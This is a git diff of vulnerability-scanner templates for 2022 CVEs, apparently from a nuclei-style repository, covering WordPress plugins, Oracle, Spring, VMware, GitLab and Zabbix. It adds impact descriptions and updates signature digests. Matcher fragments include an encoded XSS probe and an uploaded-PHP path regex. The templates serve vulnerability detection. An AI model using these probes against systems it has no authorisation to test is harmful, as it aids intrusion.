--- a/http/cves/2022/CVE-2022-1946.yaml
+++ b/http/cves/2022/CVE-2022-1946.yaml
@@ -5,6 +5,8 @@ info:
   author: Akincibor
   severity: medium
   description: WordPress Gallery plugin before 2.0.0 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, available to both unauthenticated and authenticated users.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the WordPress Gallery plugin to version 2.0.0 or later to mitigate the vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203af3e18e13ca6ce73052420efa3252492ab947e10104ef5525d6566e3f832b8d022028e61c41990e510bb02f9732390cbf9feed8e3838b039809aaa2c732abd18796:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ce8a892cfacabe365495b3f7a4777f391f6214458a2ae4664cd275e6af18f92c022100c19c580f0758d2038fa07a73c8970e509bafcaf089d549900a0281726b6820e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml
index 5ec97ad9b0..349ad84745 100644
--- a/http/cves/2022/CVE-2022-1952.yaml
+++ b/http/cves/2022/CVE-2022-1952.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could result in remote code execution, allowing an attacker to take complete control of the affected WordPress site.
   remediation: |
     Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -79,4 +81,4 @@ http:
         regex:
           - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
         internal: true
-# digest: 490a004630440220515d21269f1086c3a1fc16f26180ad6098ef5d4fab87c66d2eb34a8148565ee9022030eb4c79861ce5c58edf7e41c9dcbc0eedf864c0ae4d40e035cd5ad462dbc839:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204235b9a156d06eb4b0f35eae5887a960bb68fd26bcc8274e11c7312e8eff6cf4022100b6c5dc1528f252fb3d785f7ba8b7f3d60b61a2e7352a23b8f1be49ee1c347395:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml
index 716ee489f0..f67d8ec0ca 100644
--- a/http/cves/2022/CVE-2022-21371.yaml
+++ b/http/cves/2022/CVE-2022-21371.yaml
@@ -5,6 +5,8 @@ info:
   author: paradessia,narluin
   severity: high
   description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
+  impact: |
+    An attacker can read sensitive files containing credentials, configuration details, or other sensitive information.
   remediation: |
     Apply the latest security patches provided by Oracle to fix the vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b05d9a5489c718851644630e211ccccaf158510cd62cc95b12a4c84f90c27efc022100abb23fafccf2d3224c073db9929cd240b8bf5e964ba3ba51148664458e10669c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c4af7f3b443568987a20797c81ce356686d50e334e78bf1c00b353fa26ddfc110220515a916d358810c7aa422b1a5e04a781a590b01baed490b97b100e68cabf724c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml
index f77d295d34..5b69b7708a 100644
--- a/http/cves/2022/CVE-2022-21500.yaml
+++ b/http/cves/2022/CVE-2022-21500.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Oracle E-Business Suite application.
   remediation: |
     Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100acbb815001ca9d9b95137fa331751070ec5cc7c9c2cecd5831d4fae30f3c7c49022100934428571f2e9166a5488989cb27d6bfa4c84837685ec3796d7f76e61b3905e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d706c4e2ea1a52fe594627f0175b4e88ebe6e2f5fed3787ff138cde539bdf38902206c52e5f5968dcfee026836171dc731b7db41016e04733c42f25cfa9daba73360:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml
index 57152cdab5..ae320cd39a 100644
--- a/http/cves/2022/CVE-2022-21661.yaml
+++ b/http/cves/2022/CVE-2022-21661.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: This has been patched in 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability.
   reference:
     - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
@@ -45,4 +47,4 @@ http:
           - 'contains(body, "WordPress database error:")'
           - 'contains(body, "error in your SQL syntax")'
         condition: and
-# digest: 490a004630440220190875bb6abe4bd9cf34ff25c953ffa0609ccdbf607744ccaf3e8b6132eb92b502205fdccdf510b4c3b4fafc6cc804042cb94cdd1e79452bf7605a66d2583b71d2f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206fd90d8c7adb049d82459087b08e0e9b965bac2c35bc373e3718a6a0ac4a378e022100c3f27e95ed9c4d3f83229afee1ea4192a031f494d1bd9d3f7c749d8181f90597:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml
index 9f08749ed2..99ac01b5df 100644
--- a/http/cves/2022/CVE-2022-21705.yaml
+++ b/http/cves/2022/CVE-2022-21705.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation.
   reference:
@@ -110,4 +112,4 @@ http:
         part: body
 
 # Obtain current theme used for Markup editor of OctoberCMS
-# digest: 4b0a00483046022100d24ab00a86a1747c93915a6d866a6940c147a45cacd981f8499dcce7a596e2bf022100e8212f6212279dd36eb2e96db9c454def6032538366869cb17a1b8afdbb2ce5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bd9147628302a9c557f2b19473fe1f7c10d08033694f97493d16ed75ffb9a5ee02201d21a6330ccc7c5f7fdcf038cec4a70e9d4675e80e2375f0cddaf8418e124d08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml
index 0ced1fd42d..aceb2d8a79 100644
--- a/http/cves/2022/CVE-2022-2185.yaml
+++ b/http/cves/2022/CVE-2022-2185.yaml
@@ -5,6 +5,8 @@ info:
   author: GitLab Red Team
   severity: high
   description: GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by GitLab to mitigate this vulnerability.
   reference:
@@ -79,4 +81,4 @@ http:
         group: 1
         regex:
           - '(?:application-)(\S{64})(?:\.css)'
-# digest: 4a0a004730450220462e3ee0719b1443bcb9d483c1561a0f1657f50e9a6680e3a47d6ee8e7dfe5fc022100cea99c1d0c9251b67c14aa763a4e69070921936af6a2b94cde990f139d948b82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210090a1f7b54d9d3a6471c5f48a452b2b430a144cf24b0e6d92427a861fe555b8b5022100a5b209f560d8b964ee755aad08873b2f55a0c53c0192449292ffa3ae9e8f69de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml
index 2635599baf..961ce7b9ff 100644
--- a/http/cves/2022/CVE-2022-2187.yaml
+++ b/http/cves/2022/CVE-2022-2187.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update the WordPress Contact Form 7 Captcha plugin to version 0.1.2 or later to mitigate the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022062520c466d3497cb7d55e81e66391f204e8fb7fa4fcc2bc5cc41cc4cbd28b63a022065016dbef024a8f334af28a01ded6f6697f721470e16052cd7112ddc34036a40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022058cfd7edb7bd83159b2a7431b4f77c6db64a8d07ec46997fa32a58dd0321ff640221008bdc64a1c48e182f3da7f4a96019d28eb9e0c18b5c66dbbf0873645a60b38a0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml
index 02e8f245c1..0fc763a9ef 100644
--- a/http/cves/2022/CVE-2022-2219.yaml
+++ b/http/cves/2022/CVE-2022-2219.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected website.
   remediation: Fixed in version 2.7.27
   reference:
     - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "script%3Ealert%28document.domain%29%3C%2Fscript%3")'
           - 'contains(body_2, "Unyson")'
         condition: and
-# digest: 4a0a00473045022008a243fbead8f3378d8a97a1b68478f3c99fb69d348844555f0a5c147c55fb17022100c52a5a2f8fb01c0178617537929ed8e9fd4a016b63261ec18c4209d10c3b1e65:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009bda24d32e00b3f98f7d2d30163570a916563ffc81d3c45d4946d522bfe2542c022066400bad340a8135090fd0fa31e24d6b91f491cd4ec3298020eafdedb79c959a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml
index a8fb2f51af..84b29960c5 100644
--- a/http/cves/2022/CVE-2022-22242.yaml
+++ b/http/cves/2022/CVE-2022-22242.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220592cdb95b3b787a4f0f40a482be08a4926b7de598b452126d58534f5a57e2ded022100c1b2b969e93c86b37e107f9f808d9e25f6139ca9d315b7c51416ea94fe1bac4d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201b081f2df0951bf6388fa2791e12ec2805c1f3a98236cfd72d747307556737b40220147fcc3b90319b993623c90793726a7ec2ccd5d482f2890fb7313936fa9471a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml
index 61cc51ea68..c92bac63b8 100644
--- a/http/cves/2022/CVE-2022-22536.yaml
+++ b/http/cves/2022/CVE-2022-22536.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive data and potential data leakage.
   remediation: |
     Apply the latest security patches and updates provided by SAP to mitigate this vulnerability.
   reference:
@@ -69,4 +71,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e1af21fe55543fa952ba726445638765d34d137587d42712c5015403555069d7022100a54a58df69529e48c171a00259893b275c93d56906fce552f35780323ba2e55b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d8aca6a019b4c6ba5b7f890ef22bd5bfdd168e72151c4ce9c1c14810e2ba9ce502206bb325f43313686a75d343e1734e0ea31a5ed87be5b968c8071cd65a36afac46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml
index 34981d7abc..932a9b51ac 100644
--- a/http/cves/2022/CVE-2022-22733.yaml
+++ b/http/cves/2022/CVE-2022-22733.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application.
   remediation: |
     Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f06ce482de54a0b59be15c5f052d64d76089ff2038289f6290c65315f5aeeab302201cdedbd87b34082f27a7a7da9281cd93eb2dcd201f2ae78679914173817678b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e43a077479f63730077a3a81be1e2fbd711610fbf3c7659685dd4e58aea02262022100e6f660f175fb392499b8f8483dd8673bcbf32be6c79123ecc0e0a7a3d3a513db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml
index 1ec65f4c16..2c3e14e9d0 100644
--- a/http/cves/2022/CVE-2022-22897.yaml
+++ b/http/cves/2022/CVE-2022-22897.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - 'duration_1>=6'
           - 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")'
         condition: and
-# digest: 4b0a00483046022100e156bffaf44e0c4684758c2df8f1ab852de18915aecc260e29c82258a6d04a4e022100bd0590fb6bd93bf6a4783c494aa00def8fbf1aee9aaeb80c3024d36f7d92610f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201148f655a8cb4c351574d2fc370f9eac9455d90d1e6d1588f9000845848628ae02203d4fdfc32b9f4081ef8e981cc7a5f83ca548e749fc16722f8ef7cb47f6d1e837:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml
index d68fb6e7af..01365d249b 100644
--- a/http/cves/2022/CVE-2022-2290.yaml
+++ b/http/cves/2022/CVE-2022-2290.yaml
@@ -5,6 +5,8 @@ info:
   author: dbrwsky
   severity: medium
   description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance.
   remediation: |
     Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4a0a0047304502201caded567a0c728652d2441fc136825c849b63e22416954f59e77d7ef66afb25022100d7c6143107c501206e7a9410efba9b13ed8625fba9eaf86348c44ba4d6e9ab4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dcd26fa30b8fc7b1e91962270c6762a2dfebbfa30b8dc088f9a4feb5b0bc16ac022100b7c20d08037be4c30c6b189934f0173af2fe38ef4e94bda1e69a37f390d543c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml
index 8d1a5fc6e3..7b79655a9f 100644
--- a/http/cves/2022/CVE-2022-22947.yaml
+++ b/http/cves/2022/CVE-2022-22947.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: critical
   description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Apply the latest security patches provided by the vendor and ensure proper input validation to prevent code injection attacks.
   reference:
@@ -88,5 +90,4 @@ http:
       - type: status
         status:
           - 201
-
-# digest: 4a0a00473045022045970f5f4497901df6493d3dbdf82879069d1b301eafce4ba35b1e73ad084b5e022100d5fa720389fb9808d2c9313620036f841765310e49ccaea099ac572c20145a3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008814c5fa875684ead3fe8e473a1ca5543dd6cde5e07897c2f3c225df0ea6f41b022045cf4968ae43a13d114bd6f424908834b83a2c1d8ce4c0ba228ab7c2d911af03:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml
index 44030e73f9..4fdfcef06f 100644
--- a/http/cves/2022/CVE-2022-22954.yaml
+++ b/http/cves/2022/CVE-2022-22954.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Apply the latest security patches provided by VMware to mitigate this vulnerability.
   reference:
@@ -43,5 +45,4 @@ http:
       - type: status
         status:
           - 400
-
-# digest: 4b0a00483046022100c48da4fb03d0cef4bca4e5a75402ff222c53bffe49ec8a3ecf5f9432e864cd5402210085509296efce2b1e5e9190a93e024ef0e9b51fc4d29826be40c1a86cb33b9621:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008a68c518e7fae0829a271b7fde8ac18dce774dfbab5d702060a3377fd92fc532022029b3ce89a1f28fff47728f4d8ea2a280df2e795ab27a267b78d616246b635224:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml
index ded7e7b676..4ce35cba09 100644
--- a/http/cves/2022/CVE-2022-22963.yaml
+++ b/http/cves/2022/CVE-2022-22963.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a0047304502200ca8f8618ebbeab32124e1e73347de7685f7288cfe62442ee994c725430ba33d022100f9f5b8b28bc316082e66a15b7fc6a8a23aea4930bb36e7fbf6234f8abaf284ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203b6dd8d98d0ed516975950dfc8da7d697ad115ba73e089f7192bd340518e129602201c1e36eeecadf5614b63ff639d3272cdbbaf36d3f443fcf98cf5883c03c9a215:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml
index a653c01e07..ad491de065 100644
--- a/http/cves/2022/CVE-2022-22965.yaml
+++ b/http/cves/2022/CVE-2022-22965.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.
   reference:
     - https://tanzu.vmware.com/security/cve-2022-22965
@@ -55,4 +57,4 @@ http:
         words:
           - "User-Agent: Java"
         case-insensitive: true
-# digest: 490a0046304402207b007ff2bdb6f1a68a4fe5967f21ba747f1c7e56e876f903acb482af26af64fe022070a1c2dfca447cb14fe6fd3b40629cf7111b364e7c584a222f69070f5863e89d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e1eb3dedea23e801a5deecff442d4a3f8c84a6eb089e1d5feba8af7132857c61022065cfd1c407be7027ddef14769b2cce9c997b177d837725e2721de06477198162:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml
index 5e14818910..9f5d02bc65 100644
--- a/http/cves/2022/CVE-2022-22972.yaml
+++ b/http/cves/2022/CVE-2022-22972.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.
   remediation: |
     Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972).
   reference:
@@ -108,4 +110,4 @@ http:
         kval:
           - 'HZN'
         part: header
-# digest: 4a0a00473045022100c98a89afe4110571dad5d18a386f9e5197c584a24a0ca54f3f48e44e158fae6402204368b3feec604db75327853bbdc79a2f4f6e7ab978bd66428ea5052f3da37451:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022033ab3abb6a55a4027d1bbfe68bb60962354877f844aaabbc9d0f0a4d146a79a90221009dd2fd3eba334bbdca4b448b816d32e6a80945a522614bca2640c0a6f3e0a678:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml
index d541f14563..5ce305e24f 100644
--- a/http/cves/2022/CVE-2022-23102.yaml
+++ b/http/cves/2022/CVE-2022-23102.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
   remediation: |
     Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
         regex:
           - "name='csrfmiddlewaretoken' value='(.*)' />"
         internal: true
-# digest: 4b0a00483046022100b9745f4e55cf03547de652d8d33859f9bd32aad11a1c884de89a9397a1d5d522022100c27c5ef7ea81a977251d2636f2b77c400cfb07cff2a1416d9f3e8714b7ce2d5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100baf35131d65c93c54ecabc33bb74cf90af62dafdbccfb07826df953e450fd22c022100a2cd6496deade7bb90612837f644960d5936c31a24afe3c677cbe0910a544351:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml
index 672d258102..cb794597c4 100644
--- a/http/cves/2022/CVE-2022-23131.yaml
+++ b/http/cves/2022/CVE-2022-23131.yaml
@@ -5,6 +5,8 @@ info:
   author: For3stCo1d,spac3wh1te
   severity: critical
   description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix monitoring system.
   remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
   reference:
     - https://support.zabbix.com/browse/ZBX-20350
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4a0a00473045022079abc86a89901aeb0d889d0d7fa9df1fd34dbdb18f37389c4b85d4dc832af364022100f364b95afa144f93b30967c66e14d3a54749c076c01e2c5895307c18aa73d97d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206ea99431b6f810a82ec40d051461acd56fd1effe0cc96b5d63076d71a6df0359022100f445b8762756238767e6adc7ae4779a8499343aca6eabc49b20d020db3a35788:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml
index 451feed27d..d4df52eec6 100644
--- a/http/cves/2022/CVE-2022-23134.yaml
+++ b/http/cves/2022/CVE-2022-23134.yaml
@@ -5,6 +5,8 @@ info:
   author: bananabr
   severity: medium
   description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration.
   remediation: |
     Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.
   reference:
